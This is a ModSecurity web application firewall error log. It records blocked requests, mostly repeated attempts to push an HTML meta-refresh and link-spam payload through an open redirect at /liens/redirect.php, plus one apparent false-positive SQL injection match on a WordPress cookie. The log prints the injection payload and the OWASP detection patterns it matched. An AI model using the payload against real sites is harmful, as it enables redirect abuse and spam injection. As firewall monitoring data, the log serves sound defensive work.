[Mon May 11 19:42:00.289339 2026] [security2:error] [pid 1501883:tid 1501892] [client 27.78.84.116:65491] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6DP5Q_-MBliRCAxOYwAAAAc"]
[Mon May 11 19:42:01.327321 2026] [security2:error] [pid 1516058:tid 1516097] [client 27.78.84.116:49228] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6SMeXtzav-mi9SyXKAAAAMc"]
[Mon May 11 19:42:01.328140 2026] [security2:error] [pid 1516058:tid 1516097] [client 27.78.84.116:49228] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6SMeXtzav-mi9SyXKAAAAMc"]
[Mon May 11 19:42:01.328597 2026] [security2:error] [pid 1516058:tid 1516097] [client 27.78.84.116:49228] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6SMeXtzav-mi9SyXKAAAAMc"]
[Mon May 11 19:42:01.328808 2026] [security2:error] [pid 1516058:tid 1516097] [client 27.78.84.116:49228] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6SMeXtzav-mi9SyXKAAAAMc"]
[Mon May 11 19:42:01.329070 2026] [security2:error] [pid 1516058:tid 1516097] [client 27.78.84.116:49228] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6SMeXtzav-mi9SyXKAAAAMc"]
[Mon May 11 19:42:01.329548 2026] [security2:error] [pid 1516058:tid 1516097] [client 27.78.84.116:49228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6SMeXtzav-mi9SyXKAAAAMc"]
[Mon May 11 19:42:01.329821 2026] [security2:error] [pid 1516058:tid 1516097] [client 27.78.84.116:49228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6SMeXtzav-mi9SyXKAAAAMc"]
[Mon May 11 19:42:02.110389 2026] [security2:error] [pid 1501831:tid 1501842] [client 27.78.84.116:49346] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6lNddpkriGUb6ZVdbQAAAQk"]
[Mon May 11 19:42:02.111236 2026] [security2:error] [pid 1501831:tid 1501842] [client 27.78.84.116:49346] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6lNddpkriGUb6ZVdbQAAAQk"]
[Mon May 11 19:42:02.114485 2026] [security2:error] [pid 1501831:tid 1501842] [client 27.78.84.116:49346] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6lNddpkriGUb6ZVdbQAAAQk"]
[Mon May 11 19:42:02.114981 2026] [security2:error] [pid 1501831:tid 1501842] [client 27.78.84.116:49346] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6lNddpkriGUb6ZVdbQAAAQk"]
[Mon May 11 19:42:02.115185 2026] [security2:error] [pid 1501831:tid 1501842] [client 27.78.84.116:49346] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6lNddpkriGUb6ZVdbQAAAQk"]
[Mon May 11 19:42:02.115596 2026] [security2:error] [pid 1501831:tid 1501842] [client 27.78.84.116:49346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6lNddpkriGUb6ZVdbQAAAQk"]
[Mon May 11 19:42:02.115863 2026] [security2:error] [pid 1501831:tid 1501842] [client 27.78.84.116:49346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6lNddpkriGUb6ZVdbQAAAQk"]
[Mon May 11 19:42:02.308976 2026] [security2:error] [pid 1511173:tid 1511181] [client 45.140.167.252:51830] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f15ccb3c53676428be4706041420d3d5||1778523107||1778522747"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIU6vjVc-A-CSptvm1aOgAAAEU"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:42:02.309217 2026] [security2:error] [pid 1511173:tid 1511181] [client 45.140.167.252:51830] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIU6vjVc-A-CSptvm1aOgAAAEU"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:42:02.309448 2026] [security2:error] [pid 1511173:tid 1511181] [client 45.140.167.252:51830] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agIU6vjVc-A-CSptvm1aOgAAAEU"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 19:42:02.856716 2026] [security2:error] [pid 1516058:tid 1516095] [client 27.78.84.116:49433] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6iMeXtzav-mi9SyXKwAAAMU"]
[Mon May 11 19:42:02.858214 2026] [security2:error] [pid 1516058:tid 1516095] [client 27.78.84.116:49433] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6iMeXtzav-mi9SyXKwAAAMU"]
[Mon May 11 19:42:02.859043 2026] [security2:error] [pid 1516058:tid 1516095] [client 27.78.84.116:49433] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6iMeXtzav-mi9SyXKwAAAMU"]
[Mon May 11 19:42:02.859681 2026] [security2:error] [pid 1516058:tid 1516095] [client 27.78.84.116:49433] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6iMeXtzav-mi9SyXKwAAAMU"]
[Mon May 11 19:42:02.861241 2026] [security2:error] [pid 1516058:tid 1516095] [client 27.78.84.116:49433] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6iMeXtzav-mi9SyXKwAAAMU"]
[Mon May 11 19:42:02.861683 2026] [security2:error] [pid 1516058:tid 1516095] [client 27.78.84.116:49433] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6iMeXtzav-mi9SyXKwAAAMU"]
[Mon May 11 19:42:02.863035 2026] [security2:error] [pid 1516058:tid 1516095] [client 27.78.84.116:49433] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6iMeXtzav-mi9SyXKwAAAMU"]
